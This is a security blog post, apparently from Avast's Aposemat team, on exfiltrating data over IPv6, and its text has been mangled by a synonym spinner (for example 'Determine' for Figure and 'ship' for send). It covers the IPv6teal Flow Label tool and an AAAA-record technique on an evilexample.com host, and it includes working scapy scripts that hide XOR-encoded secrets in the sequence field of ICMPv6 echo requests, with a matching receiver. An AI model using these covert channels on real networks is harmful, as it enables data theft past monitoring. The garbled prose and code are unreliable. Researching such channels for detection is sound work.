Inside the Aposemat Staff, we’ve been engaged on testing the capabilities of IPv6 and the way malware might make the most of it. One of many subjects we explored was exfiltration of information by way of the IPv6 protocol. On this submit, we share our research into this matter.

What’s exfiltration?

Exfiltration is the unauthorized exportation of delicate information out of the community by connecting to an exterior vacation spot and/or utilizing covert channels. The latter is usually used to exfiltrate data whereas being undetected or keep away from any measure in place to cease the migration of information. There have been quite a few research on this matter, and even to at the present time, information theft produced by breaches put exfiltration within the focus.

To exfiltrate information, networking and transportation layers (proven in Determine 1) are generally used as are low degree layers that may require deep packet inspection to search out occurrences or determine that the exfiltration is occurring. In addition they present fields and parts of information within the packet headers that aren’t generally used or zeroed out. These sections can be utilized to retailer parts of information and might be unnoticed by analyzing the packet captures.

Data Exfiltration Via IPv6 | Avast

Determine 1. OSI Mannequin and outline of its layers. Layers Three and four are highlighted in gentle orange and yellow respectively. (Supply: Wikipedia)

Instruments of the commerce

A number of instruments exist to hold out exfiltration by way of IPv6 community stack. We’ll describe IPv6teal and IPv6DNSExfil, and the way these instruments are used to exfiltrate information by way of IPv6.

IPv6teal

The primary one is IPv6teal and consists of a receiver and sender (exfiltrate) script. This instruments makes use of the Circulate Label discipline which is used to label sequences of packets and it has a hard and fast dimension of 20 bits (detailed in Determine 2). It makes use of this particular discipline as a result of it might be variable and incorporates customized bits with out influence on the packet reaching its vacation spot. This element makes a great candidate for storing information that might attain an endpoint safely whereas being hidden in regular visitors.

Data Exfiltration Via IPv6 | Avast

Determine 2. IPv6 packet header construction with Circulate Label discipline (marked pink).
(Supply: Wikipedia)

To have the ability to match extra information in fewer packets the creator determined to make use of GZIP compression to perform this. In our assessments, it took roughly two seconds and 15 packets to ship a plain-text file containing the string THISISASECRET throughout the web. The knowledge is transmitted with a magic worth that marks the beginning and finish of the move of information. These magic values additionally add extra details about the info being transmitted.

The move of packets for our check find yourself being constructed this manner:

Data Exfiltration Via IPv6 | Avast
The packets are constructed over two higher layers: the IPv6 layer and a “Uncooked” layer, which is just information appended to the final layer. The uncooked layer holds the magic values, mentioned earlier, and tells the receiver when a transmission begins, what number of bits are going to be transmitted and what number of packets will likely be transmitted, not counting the packet ending the transmission.

One other exfiltration approach, on the next degree of the OSI Mannequin, is finished by way of DNS AAAA data. The AAAA data have been designed for use with IPv6 addresses. When a consumer requests the IPv6 deal with of a site it can make the most of this document to be able to get it from a DNS server. Though TXT data have been generally used for this as they’ll maintain human-readable information, in addition to machine-readable, queries to TXT data are much less frequent and might be caught rapidly throughout an research of the community move.

IPv6DNSExfil

Instruments like IPv6DNSExfil make use of this system to be able to retailer a secret, in a pseudo-IPv6 deal with format, for a brief time period on AAAA data. It is going to make use of the nsupdate device to dynamically create stated AAAA data and push them to an upstream DNS server thus exfiltrating the knowledge. A document created this manner, utilizing the identical secret that we utilized beforehand, will appear like this:

a.evilexample.com. 10 AAAA 2000:5448:4953:4953:4153:4543:5245:5400

T H  I S  I S  A S  E C  R E  T

  • DNS document
  • TTL
  • Report Kind
  • Knowledge

As soon as the document is put in place the attackers can make the most of this information as they please, both through the use of it as a C&C (as recommended by the creator) or to simply switch the knowledge from one endpoint to a different with DNS queries to that particular server.

Customized exfiltration strategies

Libraries like scapy, for Python, make it simpler for builders to work together with networking abstractions at the next degree. For instance, with solely two strains of code we’re capable of ship a crafted packet to an IPv6 endpoint:

% sudo python3
Python 3.5.2 (default, Jul 10 2019, 11:58:48)
[GCC 5.4.0 20160609] on linux
Kind “assist”, “copyright”, “credit” or “license” for extra data.
>>> from scapy.all import IPv6,Uncooked,ship
>>> ship(IPv6(dst=“XXXX:XXX:X:1662:7a8a:20ff:fe43:93d4”)/Uncooked(load=“check”))
.
Despatched 1 packets.

And sniffing on the opposite endpoint we are able to see the packet reaching its vacation spot with the additional uncooked layer that the place we included the “check” string:

# tcpdump -s0 -l -X -i eth0 ‘ip6 and never icmp6’
tcpdump: verbose output suppressed, use -v or -vv for full protocol decode
listening on eth0, link-type EN10MB (Ethernet), seize dimension 262144 bytes
23:47:15.996483 IP6 XXXX:XXX:X:1663::1ce > XXXX:XXX:X:1662:7a8a:20ff:fe43:93d4: no subsequent header
0x0000:  6000 0000 0004 3b3e XXXX XXXX XXXX 1663  `…..;>…….c
0x0010:  0000 0000 0000 01ce XXXX XXXX XXXX 1662  ……………b
0x0020:  7a8a 20ff fe43 93d4 7465 7374 0000       z….C..check..

Utilizing this similar strategy we are able to begin producing visitors dynamically utilizing scapy as a substitute of simply sending packets with out an higher transportation layer. One case can be making use of ICMPv6 protocol, which is an improved model of its IPv4 relative. A “traditional” exfiltration technique utilizing this protocol is utilizing the echo and reply messages (generally utilized by ping6 networking device) to ship information exterior the community with out establishing a connection like TCP. This fashion we are able to ship particular chunks of information over IPv6 by way of ICMPv6 echo requests to a distant host sniffing the community. Check out this code, for instance:

from scapy.all import IPv6,ICMPv6EchoRequest,ship
import sys

secret   = “THISISASECRET” # hidden data saved within the packet
endpoint = sys.argv[1] # addr the place are we sending the info

# taken from a random ping6 packet
#        0x0030:  1e38 2c5f 0000 0000 4434 0100 0000 0000  .8,_….D4……
#        0x0040:  1011 1213 1415 1617 1819 1a1b 1c1d 1e1f  …………….
#        0x0050:  2021 2223 2425 2627 2829 2a2b 2c2d 2e2f  .!”#$%&'()*+,-./
#        0x0060:  3031 3233 3435 3637                      01234567
information =  “x1ex38x2cx5fx00x00x00x00x44x34x01x00x00x00x00x00”
“x10x11x12x13x14x15x16x17x18x19x1ax1bx1cx1dx1ex1f”
“x20x21x22x23x24x25x26x27x28x29x2ax2bx2cx2dx2ex2f”
“x30x31x32x33x34x35x36x37”

def sendpkt(d):
if len(d) == 2:
seq = (ord(d[0])<<8) + ord(d[1])
else:
seq = ord(d)
ship(IPv6(dst=endpoint)/ICMPv6EchoRequest(id=0x1337,seq=seq, information=information))

# encrypt information with key 0x17
xor = lambda x: ”.be a part of([ chr(ord(c)^0x17) for c in x])

i=0
for b in vary(0, len(secret), 2):
sendpkt(xor(secret[b:b+2]))

This script will make use of the key string now we have been sending beforehand, encrypt it utilizing the XOR cipher, and ship every two bytes of that secret encrypted string by way of an ICMPv6 echo request with an particular ID. These two bytes are hidden within the sequence discipline, which is a brief integer discipline, and may be decrypted on vacation spot by a receiver. Additionally, we’re establishing the packet with an particular ID (on this case 0x1337) as a result of we need to simply acknowledge the packet as considered one of ours among the many move of networking visitors. So, let’s ship a secret!

% sudo python3 ipv6_icmp6_exfil.py XXXX:XXX:X:1663::1ce
.
Despatched 1 packets.
.
Despatched 1 packets.
.
Despatched 1 packets.
.
Despatched 1 packets.
.
Despatched 1 packets.
.
Despatched 1 packets.
.
Despatched 1 packets.

From the opposite facet of the road, there’s going to be a receiver. The receiver will examine the ID of the ICMPv6 echo request and, if it matches, it can decode the info being despatched over the sequence discipline. The code seems like this:

from scapy.all import sniff,IPv6,ICMPv6EchoRequest
import sys

xor = lambda x: chr(x ^ 0x17)

def pkt(p):
if ‘ICMPv6EchoRequest’ in p and p[‘ICMPv6EchoRequest’].id == 0x1337:
s = p[‘ICMPv6EchoRequest’].seq
print(xor((s & 0xff00)>>8) + xor(s & 0xff), finish=”)
sys.stdout.flush()

sniff(filter=“ip6 and icmp6”, prn=pkt)

After operating it, the script will sniff the community for IPv6 and ICMPv6 packets, particularly. This community sniffing is powered by tcpdump filters which is able to course of packets that might be of our pursuits. As soon as the packet is captured is processed by the pkt() operate which is able to examine the ICMPv6 ID and if it matches to the ID we’re on the lookout for it can decrypt the knowledge and print it to the display:

% sudo python3 ipv6_icmp6_recv.py
THISISASECRET

The method may be defined in an easier approach by way of the following move graph:

Data Exfiltration Via IPv6 | Avast

Determine 3. Packets with encrypted information within the sequence discipline are acquired and decrypted.

The proof-of-concept highlighted right here took the identical time as, for instance, IPv6teal with 2 seconds to transmit the key string and mimics (nearly) regular ICMPv6 that ping6 produces. We did a check with 1 kilobyte of information to be transmitted utilizing this system throughout the web and it took Eight minutes and 42 seconds to finish the duty.

In abstract

IPv6 is rising in recognition in addition to the need for extra addressing house. Though, the proportion of IPv6 adoption worldwide is decrease than 35% largely as a result of it nonetheless requires a giant effort and funding from firms and organizations. Which means that the instruments and strategies demonstrated on this article will take time to be absolutely adopted or used whereas leaving house to additional develop extra concepts and methodologies.

dnscapy,dns tunneling tutorial,dns tunneling pcap,symantec dns tunneling,check dns tunneling,dnscat snort